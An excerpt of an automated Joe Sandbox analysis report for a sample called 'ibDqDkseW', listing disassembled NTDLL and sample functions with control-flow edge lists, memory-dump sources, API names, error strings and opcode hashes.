                          • Instruction Fuzzy Hash: 69B09B719015C5C5DE12E764460CB17794077D0701F15C063D3030653F4778C5D1E275
                          Function 014D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5 14d2df0-14d2dfc LdrInitializeThunk
                          APIs
                          • LdrInitializeThunk.NTDLL(0150E73E,0000005A,0156D040,00000020,00000000,0156D040,00000080,014F4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,014DAE00), ref: 014D2DFA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2d9cbbe61f3ef9114b26a9f6c01b7a160fefd9873d0501de19e569bc1e73f124
                          • Instruction ID: c737510b91e1b7e89261371536ec5b3999a9bc7d5fa4d6e2de1311f448afea87
                          • Opcode Fuzzy Hash: 2d9cbbe61f3ef9114b26a9f6c01b7a160fefd9873d0501de19e569bc1e73f124
                          • Instruction Fuzzy Hash: 8390023120140513D51171584508707004997E0242F95C453A0424559DD7668A52A221
                          Function 014D2C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4 14d2c1d-14d2c26 LdrInitializeThunk
                          APIs
                          • LdrInitializeThunk.NTDLL(014EFD4F,000000FF,00000024,01586634,00000004,00000000,?,-00000018,7D810F61,?,?,014A8B12,?,?,?,?), ref: 014D2C24
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 44d0a923912f3442c620ca31f23fef1acd436f66e971861dc8eb0de1f0459d72
                          • Instruction ID: c6efe4434f4e12e400a536a37c7fefae65ca08dfceb11d10ec02bd3f829aa8b7
                          • Opcode Fuzzy Hash: 44d0a923912f3442c620ca31f23fef1acd436f66e971861dc8eb0de1f0459d72
                          • Instruction Fuzzy Hash: D1A00231401216578641EA18849456AB194BEE0215349C386D6864442A572414A1B6A2
                          Function 014D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 6 14d35c0-14d35cc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 162983488cf049a7db8ca1edf5ed068767f522f24aba1901f55ae90fb09ea255
                          • Instruction ID: 937af32f3c0875af5c617202bcbd3ca29800c882f6bee71cf376295130d622f7
                          • Opcode Fuzzy Hash: 162983488cf049a7db8ca1edf5ed068767f522f24aba1901f55ae90fb09ea255
                          • Instruction Fuzzy Hash: 5E90023160550502D50071584518706104597E0202F65C452A0424569DC7A58A5166A2
                          Function 0042D000 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 7 42d000-42d01a 9 42d025-42d040 7->9 10 42d01c-42d024 7->10 9->10 12 42d042-42d08a call 42e683 call 42e633 9->12 17 42d08f-42d09d 12->17
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                          • Instruction ID: e1bad01d78eea3593c0e48f5639def0373a07c299f4d63162d710884237cd9e6
                          • Opcode Fuzzy Hash: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                          • Instruction Fuzzy Hash: 90110672B406156BD324DF55DC82FFBB379DF84314F54054EFA088A181EA74AA4287D8
                          Function 0042E1E0 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 18 42e1e0-42e204 call 42e6d3 21 42e209-42e210 18->21 22 42e21f-42e224 21->22 23 42e226-42e22e 22->23 24 42e27e-42e283 22->24 25 42e22f 23->25 26 42e23e-42e243 25->26 27 42e256-42e27b 26->27 28 42e245-42e24d 26->28 27->24 29 42e253 28->29 29->27
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                          • Instruction ID: 14b503e4b4dbf4a94af14bba9f0082b6c658a07d39a71e0c42bec1849d99252b
                          • Opcode Fuzzy Hash: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                          • Instruction Fuzzy Hash: 13015671D1032C56EB60FBA9AD42FD973B89B04304F4046DAB50CA6181FE74578CCF65
                          Function 0042E1E3 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 32 42e1e3-42e224 call 42e6d3 36 42e226-42e243 32->36 37 42e27e-42e283 32->37 40 42e256-42e27b 36->40 41 42e245-42e24d 36->41 40->37 42 42e253 41->42 42->40
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                          • Instruction ID: 127a4dcd22573884f948fd3c56ad155cbe9f07fd1aa0e13e2caf42441fe7631d
                          • Opcode Fuzzy Hash: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                          • Instruction Fuzzy Hash: 32015671D1032C56EB60FB999D42FD973B85B04304F4046DAB50CA6181EE74578CCF65
                          Function 0042E594 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 45 42e594-42e5ce 46 42e5d4-42e5e5 45->46
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
                          • Instruction ID: 468f0cba1bd46181291fbb9e0a631c89db09a513db55b99bad26aa58490c7061
                          • Opcode Fuzzy Hash: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
                          • Instruction Fuzzy Hash: 31F01D76650209AFDB05CF55C881EEA77A9FF48310F08815DBC19CB642D778E511CBA4
                          Function 0042E285 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 47 42e285-42e288 48 42e28a-42e28f 47->48 49 42e22f-42e243 47->49 51 42e256-42e283 49->51 52 42e245-42e24d 49->52 53 42e253 52->53 53->51
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                          • Instruction ID: 072733a89d86e1a20b37d7505ec4f0c36fdef33088d4e3396a9911416279adb3
                          • Opcode Fuzzy Hash: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                          • Instruction Fuzzy Hash: 87F0BEB1E042685ADB60FBBA6C42BCE73689B04304F8445EAA50C92142EE3593488FA5
                          Function 0042E70E Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 57 42e70e-42e728 58 42e72e-42e735 57->58 59 42e737-42e739 58->59 60 42e749-42e74c 58->60 59->60 61 42e73b-42e747 call 42e6d3 59->61 61->60
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                          • Instruction ID: 53dceb39008c6f3320527b65ad23dff012749cc1a53a0a99b2c7f032207c0014
                          • Opcode Fuzzy Hash: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                          • Instruction Fuzzy Hash: 88E04F76B5122137D2205686AD4AFAB676DDBC1B61F4D406AFA0CAB340D5B9D90082E8
                          Function 0042E713 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 66 42e713-42e728 67 42e72e-42e735 66->67 68 42e737-42e739 67->68 69 42e749-42e74c 67->69 68->69 70 42e73b-42e747 call 42e6d3 68->70 70->69
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                          • Instruction ID: 86721405b170526936520b2b9391d4bcfdc03a2d3689df5cdf7690ad457e8398
                          • Opcode Fuzzy Hash: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                          • Instruction Fuzzy Hash: F2E04876B5022527D120558A6C06F57776C9BC1B60F494066FE0897341D564A90042E8
                          Function 0042E5A3 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 64 42e5a3-42e5ce 65 42e5d4-42e5e5 64->65
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                          • Instruction ID: dbe7326b6ecce26b87581471b72b6081cb43ca52ac60e9199f22fd608944d5c9
                          • Opcode Fuzzy Hash: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                          • Instruction Fuzzy Hash: 1EF01C72610209AFCB04CF59C881EEB73ADFB88750F04C129FD198B241D774EA10CBA0
                          Function 0042E633 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 73 42e633-42e646 74 42e64c-42e650 73->74
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                          • Instruction ID: bbb5f8cb07a0670ae8a8f12577331f64d48d0a93c97cfbbb82a283717230bf09
                          • Opcode Fuzzy Hash: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                          • Instruction Fuzzy Hash: CAC080B16103087FD700EBCCDC46F6533DC970C610F408055B90C9B342D5B4F9108754

                          Non-executed Functions

                          Function 014D2890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 271 14d2890-14d28b3 272 14d28b9-14d28cc 271->272 273 150a4bc-150a4c0 271->273 275 14d28dd-14d28df 272->275 276 14d28ce-14d28d7 272->276 273->272 274 150a4c6-150a4ca 273->274 274->272 278 150a4d0-150a4d4 274->278 277 14d28e1-14d28e5 275->277 276->275 279 150a57e-150a585 276->279 280 14d2988-14d298e 277->280 281 14d28eb-14d28fa 277->281 278->272 282 150a4da-150a4de 278->282 279->275 285 14d2908-14d290c 280->285 283 150a58a-150a58d 281->283 284 14d2900-14d2905 281->284 282->272 286 150a4e4-150a4eb 282->286 283->285 284->285 285->277 287 14d290e-14d291b 285->287 288 150a564-150a56c 286->288 289 150a4ed-150a4f4 286->289 290 150a592-150a599 287->290 291 14d2921 287->291 288->272 292 150a572-150a576 288->292 293 150a4f6-150a4fe 289->293 294 150a50b 289->294 303 150a5a1-150a5c9 call 14e0050 290->303 296 14d2924-14d2926 291->296 292->272 297 150a57c call 14e0050 292->297 293->272 298 150a504-150a509 293->298 295 150a510-150a536 call 14e0050 294->295 311 150a55d-150a55f 295->311 300 14d2928-14d292a 296->300 301 14d2993-14d2995 296->301 297->311 298->295 308 14d292c-14d292e 300->308 309 14d2946-14d2966 call 14e0050 300->309 301->300 306 14d2997-14d29b1 call 14e0050 301->306 320 14d2969-14d2974 306->320 308->309 314 14d2930-14d2944 call 14e0050 308->314 309->320 317 14d2981-14d2985 311->317 314->309 320->296 322 14d2976-14d2979 320->322 322->303 323 14d297f 322->323 323->317
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID:
                          • API String ID: 48624451-0
                          • Opcode ID: 87a6ce5527a7105dd901e6dac542ef8afa7cca4d5404196486c8456706184d6b
                          • Instruction ID: ce12ee0894ae99865573d4e81b99d7e126cd8e8a2e1011edcb67dd16ee1e93e9
                          • Opcode Fuzzy Hash: 87a6ce5527a7105dd901e6dac542ef8afa7cca4d5404196486c8456706184d6b
                          • Instruction Fuzzy Hash: A151D5B2B04216BFCF21DF9DC8A097EFBB8BB58240714826AF465D7651D3B4DE4087A0
                          Function 014AA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 324 14aa250-14aa26f 325 14aa58d-14aa594 324->325 326 14aa275-14aa291 324->326 325->326 327 14aa59a-14f79bb 325->327 328 14f79e6-14f79eb 326->328 329 14aa297-14aa2a0 326->329 327->326 334 14f79c1-14f79c6 327->334 329->328 331 14aa2a6-14aa2ac 329->331 332 14aa6ba-14aa6bc 331->332 333 14aa2b2-14aa2b4 331->333 335 14aa2ba-14aa2bd 332->335 336 14aa6c2 332->336 333->328 333->335 337 14aa473-14aa479 334->337 335->328 338 14aa2c3-14aa2c6 335->338 336->338 339 14aa2da-14aa2dd 338->339 340 14aa2c8-14aa2d1 338->340 341 14aa2e3-14aa32b 339->341 342 14aa6c7-14aa6d0 339->342 343 14f79cb-14f79d5 340->343 344 14aa2d7 340->344 346 14aa330-14aa335 341->346 342->341 347 14aa6d6-14f79ff 342->347 345 14f79da-14f79e3 call 151f290 343->345 344->339 345->328 349 14aa33b-14aa343 346->349 350 14aa47c-14aa47f 346->350 347->345 353 14aa34f-14aa35d 349->353 354 14aa345-14aa349 349->354 350->353 355 14aa485-14aa488 350->355 357 14aa48e-14aa49e 353->357 358 14aa363-14aa368 353->358 354->353 356 14aa59f-14aa5a8 354->356 355->357 359 14f7a16-14f7a19 355->359 360 14aa5aa-14aa5ac 356->360 361 14aa5c0-14aa5c3 356->361 357->359 364 14aa4a4-14aa4ad 357->364 362 14aa36c-14aa36e 358->362 359->362 363 14f7a1f-14f7a24 359->363 360->353 365 14aa5b2-14aa5bb 360->365 366 14aa5c9-14aa5cc 361->366 367 14f7a01 361->367 368 14f7a26 362->368 369 14aa374-14aa38c call 14aa6e0 362->369 370 14f7a2b 363->370 364->362 365->362 371 14f7a0c 366->371 372 14aa5d2-14aa5d5 366->372 367->371 368->370 377 14aa4b2-14aa4b9 369->377 378 14aa392-14aa3ba 369->378 374 14f7a2d-14f7a2f 370->374 371->359 372->360 374->337 376 14f7a35 374->376 379 14aa3bc-14aa3be 377->379 380 14aa4bf-14aa4c2 377->380 378->379 379->374 382 14aa3c4-14aa3cb 379->382 380->379 381 14aa4c8-14aa4d3 380->381 381->346 383 14aa3d1-14aa3d4 382->383 384 14f7ae0 382->384 386 14aa3e0-14aa3ea 383->386 385 14f7ae4-14f7afc call 151f290 384->385 385->337 386->385 388 14aa3f0-14aa40c call 14aa840 386->388 392 14aa412-14aa417 388->392 393 14aa5d7-14aa5e0 388->393 392->337 394 14aa419-14aa43d 392->394 395 14aa5e2-14aa5eb 393->395 396 14aa601-14aa603 393->396 397 14aa440-14aa443 394->397 395->396 398 14aa5ed-14aa5f1 395->398 399 14aa629-14aa631 396->399 400 14aa605-14aa623 call 1494508 396->400 401 14aa4d8-14aa4dc 397->401 402 14aa449-14aa44c 397->402 403 14aa681-14aa6ab RtlDebugPrintTimes 398->403 404 14aa5f7-14aa5fb 398->404 400->337 400->399 406 14f7a3a-14f7a42 401->406 407 14aa4e2-14aa4e5 401->407 408 14aa452-14aa454 402->408 409 14f7ad6 402->409 403->396 421 14aa6b1-14aa6b5 403->421 404->396 404->403 411 14f7a48-14f7a4c 406->411 412 14aa634-14aa64a 406->412 407->412 413 14aa4eb-14aa4ee 407->413 415 14aa45a-14aa461 408->415 416 14aa520-14aa539 call 14aa6e0 408->416 409->384 411->412 417 14f7a52-14f7a5b 411->417 418 14aa650-14aa659 412->418 419 14aa4f4-14aa50c 412->419 413->402 413->419 422 14aa57b-14aa582 415->422 423 14aa467-14aa46c 415->423 433 14aa65e-14aa665 416->433 434 14aa53f-14aa567 416->434 424 14f7a5d-14f7a60 417->424 425 14f7a85-14f7a87 417->425 418->408 419->402 426 14aa512-14aa51b 419->426 421->396 422->386 429 14aa588 422->429 423->337 428 14aa46e 423->428 430 14f7a6e-14f7a71 424->430 431 14f7a62-14f7a6c 424->431 425->412 432 14f7a8d-14f7a96 425->432 426->408 428->337 429->384 438 14f7a7e 430->438 439 14f7a73-14f7a7c 430->439 437 14f7a81 431->437 432->408 435 14aa66b-14aa66e 433->435 436 14aa569-14aa56b 433->436 434->436 435->436 440 14aa674-14aa67c 435->440 436->423 441 14aa571-14aa573 436->441 437->425 438->437 439->432 440->397 442 14aa579 441->442 443 14f7a9b-14f7aa4 441->443 442->422 443->442 444 14f7aaa-14f7ab0 443->444 444->442 445 14f7ab6-14f7abe 444->445 445->442 446 14f7ac4-14f7acf 445->446 446->445 447 14f7ad1 446->447 447->442
                          Strings
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 014F79D0, 014F79F5
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F79D5
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F79FA
                          • SsHd, xrefs: 014AA3E4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                          • API String ID: 0-929470617
                          • Opcode ID: 3a9f9bdf31c65b96b18feb18884afee303bf6bb8945723359c095836fa74a7a8
                          • Instruction ID: 522bea5d03bbeec0df04db108a7566f2a2944108edcea29529cbe5850cecdaa0
                          • Opcode Fuzzy Hash: 3a9f9bdf31c65b96b18feb18884afee303bf6bb8945723359c095836fa74a7a8
                          • Instruction Fuzzy Hash: 9BE1D5706043028FE725CE28C484B6B7BE1BB94214F664A2FFAA5CB3B1D735D945CB52
                          Function 014AD770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 014F9341, 014F9366
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F9346
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F936B
                          • GsHd, xrefs: 014AD874
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                          • API String ID: 3446177414-576511823
                          • Opcode ID: 5497e3488b846574d72e816f6b0a95046c89a20b4c71480e04bc145f41f3ff2f
                          • Instruction ID: 2b66f2eb1c3e081aa73db06bba0f9850dcd719d6bab283006b5ee93f70f0ea18
                          • Opcode Fuzzy Hash: 5497e3488b846574d72e816f6b0a95046c89a20b4c71480e04bc145f41f3ff2f
                          • Instruction Fuzzy Hash: FBE19071A043428FDB24CF58C480B6BBBE5BB58318F45492EFA958B7A1D770D945CB42
                          Function 014DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                          • Instruction ID: 2540f16863b3988244a122ff114582ccabd229c4629d20b6bb056141d6485706
                          • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
